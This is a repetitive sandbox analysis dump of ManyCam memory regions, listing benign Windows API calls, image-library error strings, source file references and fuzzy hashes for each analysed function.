                                                                                                                                            • Opcode Fuzzy Hash: c574cfb1be46fc766cd4d0dcad4e9aed8f2e66d88e2508abe8694121230a2c95
                                                                                                                                            • Instruction Fuzzy Hash: 51B17B716042498FCB24DE68C881ABFB7EAEF84300F44456CFD8A97341DBF5A904CB92
                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCR80 ref: 00B91AC2
                                                                                                                                            • IsWindow.USER32(?), ref: 00B91ACB
                                                                                                                                            • SendMessageA.USER32(?,0000042C,0000002C,?), ref: 00B91AE5
                                                                                                                                            • ICSendMessage.MSVFW32(?,0000400E,00000000,00000000), ref: 00B91B7D
                                                                                                                                            • ICClose.MSVFW32(?,?,0000400E,00000000,00000000), ref: 00B91B86
                                                                                                                                            • ICOpen.MSVFW32(43444956,?,00000002), ref: 00B91B97
                                                                                                                                            • ICSendMessage.MSVFW32(00000000,0000400C,?,?,43444956,?,00000002), ref: 00B91BB7
                                                                                                                                            • cvReleaseImage.CXCORE099(?,00000000,0000400C,?,?,43444956,?,00000002), ref: 00B91BC8
                                                                                                                                            • cvCreateImage.CXCORE099(?,?,00000008,00000003,?,00000000,0000400C,?,?,43444956,?,00000002), ref: 00B91BDB
                                                                                                                                            • ICDecompress.MSVFW32(?,00000000,?,?,00000008,?,?,?,00000008,00000003,?,00000000,0000400C,?,?,43444956), ref: 00B91C08
                                                                                                                                            • cvInitImageHeader.CXCORE099(?,?,?,00000008,00000003,00000001,00000004,?,?,?,?,00000000,0000400C,?,?,43444956), ref: 00B91C2F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ImageMessageSend$CloseCreateDecompressHeaderInitOpenReleaseWindowmemset
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2363853983-0
                                                                                                                                            • Opcode ID: 4d66b33db47b87435439d3d4777eebc809bc781824500107d53350743be99990
                                                                                                                                            • Instruction ID: f722e5ac73b2dc57269b18ff6922b45c49d643f4d65add79988010ee4ad1461b
                                                                                                                                            • Opcode Fuzzy Hash: 4d66b33db47b87435439d3d4777eebc809bc781824500107d53350743be99990
                                                                                                                                            • Instruction Fuzzy Hash: 40518E712443019BDB24EF18CC91F6B77E9EF94700F1448ADFA40AB282E771E845DB91
                                                                                                                                            APIs
                                                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 004087E6
                                                                                                                                              • Part of subcall function 0040DA70: SetWindowPos.USER32(000001E2,-0000012B,000001E2,00000000,00000000,00000000,0040880B,?,?,0040880B,00000000,00000000,00000000,000001E2,-0000012B), ref: 0040DA95
                                                                                                                                              • Part of subcall function 004065F0: GetParent.USER32(?), ref: 004065FD
                                                                                                                                              • Part of subcall function 00406670: GetParent.USER32 ref: 0040669A
                                                                                                                                              • Part of subcall function 00406670: GetWindowRect.USER32(?,?), ref: 004066C0
                                                                                                                                              • Part of subcall function 00406670: GetWindowLongW.USER32(00000000,000000F0), ref: 004066DD
                                                                                                                                              • Part of subcall function 00406670: SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0040670D
                                                                                                                                              • Part of subcall function 004CB5F0: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 004CB626
                                                                                                                                              • Part of subcall function 004CB5F0: _wmkdir.MSVCR80 ref: 004CB633
                                                                                                                                              • Part of subcall function 0040EE30: _DebugHeapAllocator.LIBCPMTD ref: 0040EE68
                                                                                                                                              • Part of subcall function 0040EE30: _DebugHeapAllocator.LIBCPMTD ref: 0040EEAA
                                                                                                                                              • Part of subcall function 004164A0: FindFirstFileW.KERNEL32(00000000,00000104,000000D8,00000104,00000000), ref: 004164F5
                                                                                                                                            • MoveWindow.USER32(00000000,?,00000485,00000015,0000002D,00000052,00000017,00000000,00000117,000000C6,000000AF,00000017,00000001,00000000,?,0000048A), ref: 00408C6C
                                                                                                                                            • MoveWindow.USER32(00000000,?,0000048B,0000011C,00000104,00000058,00000017,00000000), ref: 00408CA4
                                                                                                                                            • MoveWindow.USER32(00000000,?,0000048C,0000017A,00000104,00000058,00000017,00000000), ref: 00408CDC
                                                                                                                                            • Concurrency::details::SchedulerBase::GetPolicy.LIBCMTD ref: 00408D50
                                                                                                                                            • Concurrency::task_options::get_scheduler.LIBCPMTD ref: 00408DF3
                                                                                                                                            • _DebugHeapAllocator.LIBCPMTD ref: 00408E57
                                                                                                                                            Strings
                                                                                                                                            • http://manycam.com/help/effects, xrefs: 00408A61
                                                                                                                                            • \ManyCam\TempBackgroundPreview, xrefs: 00408853
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$AllocatorDebugHeapMove$ParentSystem$Base::Concurrency::details::Concurrency::task_options::get_schedulerFileFindFirstFolderInfoLongMetricsParametersPathPolicyRectSchedulerSpecial_wmkdir
                                                                                                                                            • String ID: \ManyCam\TempBackgroundPreview$http://manycam.com/help/effects
                                                                                                                                            • API String ID: 802195438-2992585156
                                                                                                                                            • Opcode ID: ad0380625fa3cecf4b5e51684995b29088e82c278d6510ee7f53ab51bdbc22ca
                                                                                                                                            • Instruction ID: 373e2faf4f294b9354e902988eb878b0a96774ffebd8d1961b2fcec7c08dd6c9
                                                                                                                                            • Opcode Fuzzy Hash: ad0380625fa3cecf4b5e51684995b29088e82c278d6510ee7f53ab51bdbc22ca
                                                                                                                                            • Instruction Fuzzy Hash: 11121F70A041189BEB24EB55CD91BED7775AF44308F0044EEA20E7B2C2DE796E94CF69
                                                                                                                                            Strings
                                                                                                                                            • malformed width string in sCAL chunk, xrefs: 00BBDD12
                                                                                                                                            • Invalid sCAL after IDAT, xrefs: 00BBDC71
                                                                                                                                            • Out of memory while processing sCAL chunk, xrefs: 00BBDC57
                                                                                                                                            • Invalid sCAL data, xrefs: 00BBDDC6
                                                                                                                                            • Duplicate sCAL chunk, xrefs: 00BBDCA2
                                                                                                                                            • malformed height string in sCAL chunk, xrefs: 00BBDD55
                                                                                                                                            • Missing IHDR before sCAL, xrefs: 00BBDC32
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Duplicate sCAL chunk$Invalid sCAL after IDAT$Invalid sCAL data$Missing IHDR before sCAL$Out of memory while processing sCAL chunk$malformed height string in sCAL chunk$malformed width string in sCAL chunk
                                                                                                                                            • API String ID: 0-2190877121
                                                                                                                                            • Opcode ID: 3d58a6fef7a9dc5b87a20275046a122ccb8ce910b505f25955fc21deddd8c998
                                                                                                                                            • Instruction ID: 6e12b7665773636694042c42e2fab95c99dddf21b94081067c091a95d50a7524
                                                                                                                                            • Opcode Fuzzy Hash: 3d58a6fef7a9dc5b87a20275046a122ccb8ce910b505f25955fc21deddd8c998
                                                                                                                                            • Instruction Fuzzy Hash: C2414E756002042BD700BB04ACC1EFB77D8EFC6B65F8405D9F98852253E7EE991A92B2
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            • Ignoring gAMA chunk with gamma=0, xrefs: 00BBC548
                                                                                                                                            • Out of place gAMA chunk, xrefs: 00BBC4B0
                                                                                                                                            • Missing IHDR before gAMA, xrefs: 00BBC47E
                                                                                                                                            • Duplicate gAMA chunk, xrefs: 00BBC4D2
                                                                                                                                            • gamma = (%d/100000), xrefs: 00BBC587
                                                                                                                                            • Incorrect gAMA chunk length, xrefs: 00BBC4F8
                                                                                                                                            • Invalid gAMA after IDAT, xrefs: 00BBC48F
                                                                                                                                            • Ignoring incorrect gAMA value when sRGB is also present, xrefs: 00BBC572
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: fprintf
                                                                                                                                            • String ID: Duplicate gAMA chunk$Ignoring gAMA chunk with gamma=0$Ignoring incorrect gAMA value when sRGB is also present$Incorrect gAMA chunk length$Invalid gAMA after IDAT$Missing IHDR before gAMA$Out of place gAMA chunk$gamma = (%d/100000)
                                                                                                                                            • API String ID: 383729395-996772653
                                                                                                                                            • Opcode ID: 2f12f70489f75b95bc38666ccd36350b3e3dc8a5b1a9aabae1c178908b6d4e32
                                                                                                                                            • Instruction ID: 5d2d4baf0e1025db1494f64e1d4d0d1b60b3c1703b779e9f63a496171b286cdf
                                                                                                                                            • Opcode Fuzzy Hash: 2f12f70489f75b95bc38666ccd36350b3e3dc8a5b1a9aabae1c178908b6d4e32
                                                                                                                                            • Instruction Fuzzy Hash: E23157B27006042BD610FA19EC92EFF7BD8EFD1755F0804E9F588A2253DBD49A0182E6
                                                                                                                                            APIs
                                                                                                                                            • cvError.CXCORE099(000000E5,cvResizeWindow,NULL name,.\window_w32.cpp,000002A9), ref: 00B95392
                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00B9540A
                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00B95415
                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00B95424
                                                                                                                                            • MoveWindow.USER32(?,00000001,?,?,?,00000001,?,?,?,?,00000000), ref: 00B95460
                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00B954A2
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$Move$Rect$ClientError
                                                                                                                                            • String ID: .\window_w32.cpp$NULL name$cvResizeWindow
                                                                                                                                            • API String ID: 3901070998-2204944233
                                                                                                                                            • Opcode ID: bacbd2835c980b100319c26609096e08bb296ad4098642e6969e94b8079c553f
                                                                                                                                            • Instruction ID: 325be935fdbd6aa692cd579f16625d861016bd2c3417570e5b2a8840696cba5a
                                                                                                                                            • Opcode Fuzzy Hash: bacbd2835c980b100319c26609096e08bb296ad4098642e6969e94b8079c553f
                                                                                                                                            • Instruction Fuzzy Hash: 20317975214301AFCB18DF28CC95D2BB7E9FBC8714F098A5CF98A97254E670E8018B91
                                                                                                                                            APIs
                                                                                                                                            • _DebugHeapAllocator.LIBCPMTD ref: 0050E09D
                                                                                                                                            • _DebugHeapAllocator.LIBCPMTD ref: 0050E0C5
                                                                                                                                              • Part of subcall function 0050E4A0: _DebugHeapAllocator.LIBCPMTD ref: 0050E4E3
                                                                                                                                              • Part of subcall function 0050E4A0: _DebugHeapAllocator.LIBCPMTD ref: 0050E4FF
                                                                                                                                            • ??0CxImage@@QAE@PAEKK@Z.CXIMAGECRT(&<Q,?,00000000,?,?,?,&<Q), ref: 0050E12E
                                                                                                                                            • ?Encode2RGBA@CxImage@@QAE_NAAPAEAAJ_N@Z.CXIMAGECRT(00000000,00000000,00000000,&<Q,?,00000000,?,?,?,&<Q), ref: 0050E155
                                                                                                                                            • ?GetHeight@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,&<Q,?,00000000,?,?,?,&<Q), ref: 0050E160
                                                                                                                                            • ?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,00000000,&<Q,?,00000000,?,?,?,&<Q), ref: 0050E16C
                                                                                                                                            • ??3@YAXPAX@Z.MSVCR80(?,00000000,?,?,00000008,00000004,00000000,00000004,00000000,00000000,00000000,00000000,00000000,&<Q,?,00000000), ref: 0050E1B7
                                                                                                                                            • ~_Mpunct.LIBCPMTD ref: 0050E1D3
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocatorDebugHeapImage@@$??3@Encode2Height@MpunctWidth@
                                                                                                                                            • String ID: &<Q
                                                                                                                                            • API String ID: 2867035028-2887711709
                                                                                                                                            • Opcode ID: fbbaa05d77a0a2c3aee7ba4de5523e50d8f2c9dc1e9e8a6a3e8fff9c4fd9968c
                                                                                                                                            • Instruction ID: 4fa1d1e2ea6a526748637154a1db03ed3227427cf2602f353b57d12039db24cc
                                                                                                                                            • Opcode Fuzzy Hash: fbbaa05d77a0a2c3aee7ba4de5523e50d8f2c9dc1e9e8a6a3e8fff9c4fd9968c
                                                                                                                                            • Instruction Fuzzy Hash: 175137B1D00259AFDB14EF54CC46BEEBBB8AF54304F1082ADE519A7281DB746B84CF90
                                                                                                                                            APIs
                                                                                                                                            • ??0_Lockit@std@@QAE@H@Z.MSVCP80(00000000,7EC02BB4,?,00538D19,000000FF,?,005028F6,?,?,00000000,00000001), ref: 0050449A
                                                                                                                                            • ??Bid@locale@std@@QAEIXZ.MSVCP80(?,005028F6,?,?,00000000), ref: 005044B4
                                                                                                                                            • ?_Getfacet@locale@std@@QBEPBVfacet@12@I@Z.MSVCP80(005028F6,?,005028F6,?,?,00000000), ref: 005044C4
                                                                                                                                            • ??1_Lockit@std@@QAE@XZ.MSVCP80(00585C98,00585C98), ref: 00504548
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Getfacet@locale@std@@Vfacet@12@
                                                                                                                                            • String ID: bad cast
                                                                                                                                            • API String ID: 2261832285-3145022300
                                                                                                                                            • Opcode ID: 923687adefb6f0c19f08b85b92506c3169178af31264b40b8c27a0d15710eb83
                                                                                                                                            • Instruction ID: daf008f5657916d2d0eedf94b6e793cb89aacae9b3ddac5973414a6306a2ac1a
                                                                                                                                            • Opcode Fuzzy Hash: 923687adefb6f0c19f08b85b92506c3169178af31264b40b8c27a0d15710eb83
                                                                                                                                            • Instruction Fuzzy Hash: CE31F7B5D04209DFDB18DFA4EC45AAEBBB4FB58310F10862AE922A33D0DB745945DF50
                                                                                                                                            APIs
                                                                                                                                            • LoadIconA.USER32 ref: 00B9685D
                                                                                                                                            • LoadCursorA.USER32(00000000,00007F03), ref: 00B9686D
                                                                                                                                            • GetStockObject.GDI32(00000002), ref: 00B9687F
                                                                                                                                            • RegisterClassA.USER32(?), ref: 00B96890
                                                                                                                                            • GetStockObject.GDI32(00000002), ref: 00B968A1
                                                                                                                                            • RegisterClassA.USER32(?), ref: 00B968B4
                                                                                                                                              • Part of subcall function 00BDBDA9: __onexit.MSVCRT ref: 00BDBDAD
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ClassLoadObjectRegisterStock$CursorIcon__onexit
                                                                                                                                            • String ID: #$HighGUI class$Main HighGUI class
                                                                                                                                            • API String ID: 1477171359-2338146754
                                                                                                                                            • Opcode ID: 1dcc0684175f16a4743a60ba82c4ef0c2cf243225e40fbc357ceaf89d5e64d49
                                                                                                                                            • Instruction ID: c28e802bf3dd6dd4d86efbaba184166e4b4f6d0d929e8c287c467e14abe1a2ea
                                                                                                                                            • Opcode Fuzzy Hash: 1dcc0684175f16a4743a60ba82c4ef0c2cf243225e40fbc357ceaf89d5e64d49
                                                                                                                                            • Instruction Fuzzy Hash: 2E1116B28193119FC740DF69D888A0AFBE4FB88B04F00096FF48897261E7B495498F86
                                                                                                                                            APIs
                                                                                                                                            • cvSet.CXCORE099(?,?,?,?,?,?,00000000), ref: 004026F7
                                                                                                                                            • cvGEMM.CXCORE099(?,?), ref: 00402755
                                                                                                                                            • _CIsqrt.MSVCR80 ref: 004027F6
                                                                                                                                            • cvGEMM.CXCORE099(?,?), ref: 00402852
                                                                                                                                            • cvSet2D.CXCORE099(?,?,?), ref: 004028DB
                                                                                                                                            • cvGEMM.CXCORE099(?,?,?,00000000,?,00000000), ref: 00402925
                                                                                                                                            • cvSet2D.CXCORE099(?,?,?), ref: 0040299E
                                                                                                                                            • cvGEMM.CXCORE099(?,?,?,00000000,?,00000000), ref: 00402A4D
                                                                                                                                            • cvGEMM.CXCORE099(?,?), ref: 00402ADA
                                                                                                                                            • cvLine.CXCORE099(?,?,?,?,?), ref: 00402B4D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Set2$IsqrtLine
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2296038289-0
                                                                                                                                            • Opcode ID: 5380ecd6c58ae11980828ad1f4b84ea6df1e54ba14efa23bf64b0481e8ed7457
                                                                                                                                            • Instruction ID: 98af563dca7e08dae4733c818569099b16958337ef14baff457f1a71e3476642
                                                                                                                                            • Opcode Fuzzy Hash: 5380ecd6c58ae11980828ad1f4b84ea6df1e54ba14efa23bf64b0481e8ed7457
                                                                                                                                            • Instruction Fuzzy Hash: C8F16CB1A05601DFC305AF60D589A6ABFF0FF84740F614D88E4D5262A9E731D8B5CF86
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _ftol
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2545261903-0
                                                                                                                                            • Opcode ID: 63b0a28bd0dbf413c891d77e37c6e56a85a26630c6cd36d132b08587f0fe0b65
                                                                                                                                            • Instruction ID: 03158efbed7dbf1c15d744c412501b640206b3e83cdf03e2ad7e984185cdcfe2
                                                                                                                                            • Opcode Fuzzy Hash: 63b0a28bd0dbf413c891d77e37c6e56a85a26630c6cd36d132b08587f0fe0b65
                                                                                                                                            • Instruction Fuzzy Hash: E45102716053029FC305AF21DA29256FBF4FB84340F224A2EE0C6977A6FB349469CF81
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00B94A80: GetWindowLongA.USER32(?,000000EB), ref: 00B94A83
                                                                                                                                            • DefWindowProcA.USER32(?,?,?,?), ref: 00B95656
                                                                                                                                            • CallWindowProcA.USER32(?,?,?,?,?), ref: 00B95687
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
